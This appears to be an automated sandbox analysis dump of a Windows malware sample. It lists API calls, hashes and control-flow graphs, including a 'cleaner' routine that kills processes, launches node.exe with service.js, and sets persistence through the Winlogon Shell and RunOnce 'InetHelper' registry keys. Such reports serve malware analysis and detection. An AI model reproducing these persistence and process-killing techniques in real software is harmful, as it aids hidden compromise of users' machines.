                                                                                                                                                                                                              • Opcode ID: 7e8f2b507172300fff4d18ea8023ba838134d56d13ff8a7450bb17b0ad457722
                                                                                                                                                                                                              • Instruction ID: 71396637bdf4209a45bd355f469bd078e3083f4a568c77181c36ba1a701e5b4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e8f2b507172300fff4d18ea8023ba838134d56d13ff8a7450bb17b0ad457722
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2701BC7250020AEBDF218F55CD0AEDB3FA8EF54364F01403AFD16A2190E378DA24CBA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_00ED107D 1 Function_00ED1000 0->1

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00ED107D Relevance: 107.1, APIs: 46, Strings: 15, Instructions: 327registryprocessfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00ED1097
                                                                                                                                                                                                              • _wsplitpath.MSVCRT ref: 00ED10B4
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00ED10BD
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00ED10C9
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00ED10FC
                                                                                                                                                                                                              • memset.MSVCRT ref: 00ED1113
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00ED112C
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00ED1153
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000411,00000000,?), ref: 00ED1168
                                                                                                                                                                                                              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104), ref: 00ED1188
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00ED119A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000009), ref: 00ED11A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00ED11AC
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00ED11B7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00ED11C2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000080,00000000), ref: 00ED11F5
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00ED11FE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00ED120F
                                                                                                                                                                                                              • MoveFileExW.KERNELBASE(00000000,00000000,00000001), ref: 00ED1259
                                                                                                                                                                                                              • memset.MSVCRT ref: 00ED126B
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000003,00000000,00000002,00000080,00000000), ref: 00ED1295
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00ED12AD
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 00ED12B1
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 00ED12BA
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00ED12C7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 00ED12CB
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 00ED12CE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00ED12D7
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 00ED12E3
                                                                                                                                                                                                                • Part of subcall function 00ED1000: wcslen.MSVCRT ref: 00ED101C
                                                                                                                                                                                                                • Part of subcall function 00ED1000: calloc.MSVCRT ref: 00ED1030
                                                                                                                                                                                                                • Part of subcall function 00ED1000: wcslen.MSVCRT ref: 00ED104B
                                                                                                                                                                                                                • Part of subcall function 00ED1000: memcpy.MSVCRT ref: 00ED1061
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00ED12E6
                                                                                                                                                                                                              • memset.MSVCRT ref: 00ED1327
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000008,00000000,?,?,?), ref: 00ED134A
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00ED1351
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00ED1358
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00ED135E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00ED1364
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00ED136A
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00ED13A1
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00ED13AE
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,Shell,00000000,00000001,00000000,00000000), ref: 00ED13CC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00ED13D8
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00ED13DB
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00ED1417
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00ED141E
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,InetHelper,00000000,00000001,00000000,00000000), ref: 00ED1437
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00ED143D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2140729083.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000E.00000002.2140714156.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000E.00000002.2140744009.0000000000ED2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_ed0000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$HandleProcess$Create$free$CurrentFilewcslen$memset$ChangeDuplicateFindNameNotificationProcess32Value_wcsicmp$CommandFirstFullImageLineModuleMoveNextOpenQuerySnapshotTerminateToolhelp32_wsplitpathcallocmemcpywcsstr
                                                                                                                                                                                                              • String ID: <!$<!$InetHelper$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$Shell$St0P$\\?\pipe\$explorer.exe,"$node.exe$node.exe" "$service.js"$service.js.lock$servicelog.prev.txt$servicelog.txt
                                                                                                                                                                                                              • API String ID: 2280789697-4068444580
                                                                                                                                                                                                              • Opcode ID: c6b2756caa1f7034a6e2cb33049c064c40c439ef698fd614c9f4df962b71ec07
                                                                                                                                                                                                              • Instruction ID: 623751e6085c4d26861fd5c497bfdd7328fccc5c57b8b1cebea74a91903a46b5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6b2756caa1f7034a6e2cb33049c064c40c439ef698fd614c9f4df962b71ec07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28A181B2141304BFE321ABA1EC89FAB77ADEB94744F00441FF745E2191DA719909CB72
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00ED1000 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 26 ed1000-ed100f 27 ed102a-ed103c calloc 26->27 28 ed1011-ed1015 26->28 30 ed103e 27->30 31 ed1075-ed107c 27->31 29 ed1017-ed1028 wcslen 28->29 29->27 29->29 32 ed1042-ed1073 wcslen memcpy 30->32 32->31 32->32
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2140729083.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000E.00000002.2140714156.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000E.00000002.2140744009.0000000000ED2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_ed0000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcslen$callocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1707914859-0
                                                                                                                                                                                                              • Opcode ID: 4523308149d20d3519ad647e4a1aa5a5fd02975461ddc67d0781c2e0485c4e9f
                                                                                                                                                                                                              • Instruction ID: c6df1a850f2c48556987ab237d3b01586a4d86990d7695f4f416ebb0016e6f87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4523308149d20d3519ad647e4a1aa5a5fd02975461ddc67d0781c2e0485c4e9f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8101D6765043059FD710DF98EC48852BBE4EF94358B00041EF945A3361EB31EC4DCAA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 004034A5 Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 410stringfilecomCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 54 4036b2-4036b3 36->54 55 4036b4-4036ba 36->55 43 4035f2-4035fa 37->43 44 40360b-403644 37->44 38->39 52 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->52 56 403814-403824 ExitProcess OleUninitialize 39->56 57 403769-40376f 39->57 48 403601 43->48 49 4035fc-4035ff 43->49 50 403661-40369b 44->50 51 403646-40364b 44->51 48->44 49->44 49->48 50->36 53 40369d-4036a1 50->53 51->50 58 40364d-403655 51->58 52->39 52->56 53->36 60 4036c2-4036d0 call 4063e8 53->60 54->55 55->28 61 4036c0 55->61 64 40394a-403950 56->64 65 40382a-40383a call 405a4e ExitProcess 56->65 62 403804-40380b call 403ad8 57->62 63 403775-403780 call 405cea 57->63 66 403657-40365a 58->66 67 40365c 58->67 71 4036d5 60->71 61->71 80 403810 62->80 84 403782-4037b7 63->84 85 4037ce-4037d8 63->85 68 403952-403968 GetCurrentProcess OpenProcessToken 64->68 69 4039ce-4039d6 64->69 66->50 66->67 67->50 77 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 68->77 78 40399e-4039ac call 4067c2 68->78 81 4039d8 69->81 82 4039dc-4039e0 ExitProcess 69->82 71->29 77->78 92 4039ba-4039c5 ExitWindowsEx 78->92 93 4039ae-4039b8 78->93 80->56 81->82 89 4037b9-4037bd 84->89 86 403840-403854 call 4059b9 lstrcatW 85->86 87 4037da-4037e8 call 405dc5 85->87 100 403861-40387b lstrcatW lstrcmpiW 86->100 101 403856-40385c lstrcatW 86->101 87->56 102 4037ea-403800 call 4063e8 * 2 87->102 94 4037c6-4037ca 89->94 95 4037bf-4037c4 89->95 92->69 99 4039c7-4039c9 call 40140b 92->99 93->92 93->99 94->89 96 4037cc 94->96 95->94 95->96 96->85 99->69 100->56 105 40387d-403880 100->105 101->100 102->62 107 403882-403887 call 40591f 105->107 108 403889 call 40599c 105->108 115 40388e-40389c SetCurrentDirectoryW 107->115 108->115 116 4038a9-4038d2 call 4063e8 115->116 117 40389e-4038a4 call 4063e8 115->117 121 4038d7-4038f3 call 40640a DeleteFileW 116->121 117->116 124 403934-40393c 121->124 125 4038f5-403905 CopyFileW 121->125 124->121 127 40393e-403945 call 4061ae 124->127 125->124 126 403907-403927 call 4061ae call 40640a call 4059d1 125->126 126->124 136 403929-403930 CloseHandle 126->136 127->56 136->124
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(004366E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                                                                                                              • CharNextW.USER32(00000000,004C1000,00000020,004C1000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002000,004D5000,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004D5000,00001FFB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,\Temp), ref: 00403705
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00001FFC,004D5000,004D5000,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,Low), ref: 00403721
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004D5000,004D5000,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004D5000,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004D1000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,~nsu), ref: 0040384D
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,0040A328), ref: 0040385C
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,.tmp), ref: 00403867
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004D5000,004CD000,004D5000,.tmp,004D5000,~nsu,004C1000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004D5000,004D5000,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(004326E8,004326E8,?,00471000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                                                                                                              • CopyFileW.KERNEL32(004DD000,004326E8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,004326E8,004326E8,?,004326E8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                              • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu$&C
                                                                                                                                                                                                              • API String ID: 424501083-3710082758
                                                                                                                                                                                                              • Opcode ID: e783125dba734ed597e1940b01dc1cab2e95ffc2bcbea3dcea6e2450cdaed4c7
                                                                                                                                                                                                              • Instruction ID: a55e1ba19ca46540f0e819ab7f1242b390505e394ddfc82397b04f5546c7078a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e783125dba734ed597e1940b01dc1cab2e95ffc2bcbea3dcea6e2450cdaed4c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D1D671600310AAD7206F769D49B3B3AACEB4074AF10443FF985B62D2DBBD8D45876E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 344 405afa-405b20 call 405dc5 347 405b22-405b34 DeleteFileW 344->347 348 405b39-405b40 344->348 349 405cb6-405cba 347->349 350 405b42-405b44 348->350 351 405b53-405b63 call 4063e8 348->351 353 405c64-405c69 350->353 354 405b4a-405b4d 350->354 357 405b72-405b73 call 405d09 351->357 358 405b65-405b70 lstrcatW 351->358 353->349 356 405c6b-405c6e 353->356 354->351 354->353 359 405c70-405c76 356->359 360 405c78-405c80 call 40672b 356->360 361 405b78-405b7c 357->361 358->361 359->349 360->349 368 405c82-405c96 call 405cbd call 405ab2 360->368 364 405b88-405b8e lstrcatW 361->364 365 405b7e-405b86 361->365 367 405b93-405baf lstrlenW FindFirstFileW 364->367 365->364 365->367 369 405bb5-405bbd 367->369 370 405c59-405c5d 367->370 384 405c98-405c9b 368->384 385 405cae-405cb1 call 405450 368->385 373 405bdd-405bf1 call 4063e8 369->373 374 405bbf-405bc7 369->374 370->353 372 405c5f 370->372 372->353 386 405bf3-405bfb 373->386 387 405c08-405c13 call 405ab2 373->387 376 405bc9-405bd1 374->376 377 405c3c-405c4c FindNextFileW 374->377 376->373 382 405bd3-405bdb 376->382 377->369 381 405c52-405c53 FindClose 377->381 381->370 382->373 382->377 384->359 388 405c9d-405cac call 405450 call 4061ae 384->388 385->349 386->377 389 405bfd-405c06 call 405afa 386->389 397 405c34-405c37 call 405450 387->397 398 405c15-405c18 387->398 388->349 389->377 397->377 401 405c1a-405c2a call 405450 call 4061ae 398->401 402 405c2c-405c32 398->402 401->377 402->377
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,004D5000,74DF2EE0,00000000), ref: 00405B23
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00456730,\*.*), ref: 00405B6B
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00456730,?,?,004D5000,74DF2EE0,00000000), ref: 00405B94
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00456730,?,?,?,0040A014,?,00456730,?,?,004D5000,74DF2EE0,00000000), ref: 00405BA4
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                              • String ID: 0gE$\*.*
                                                                                                                                                                                                              • API String ID: 2035342205-2711052210
                                                                                                                                                                                                              • Opcode ID: 3334b6062cde555aafe81a7f2d70c90e4ee62922905af9c316e4bc959eba850f
                                                                                                                                                                                                              • Instruction ID: db7c1e1462c3060b38713ca1582bdc14a6091e72a68d91c70f93002fb38cedfa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3334b6062cde555aafe81a7f2d70c90e4ee62922905af9c316e4bc959eba850f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7941F230805B18A6EB20AB618C89BAF7778DF41718F10813BF805711D2D77C59C28EAE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
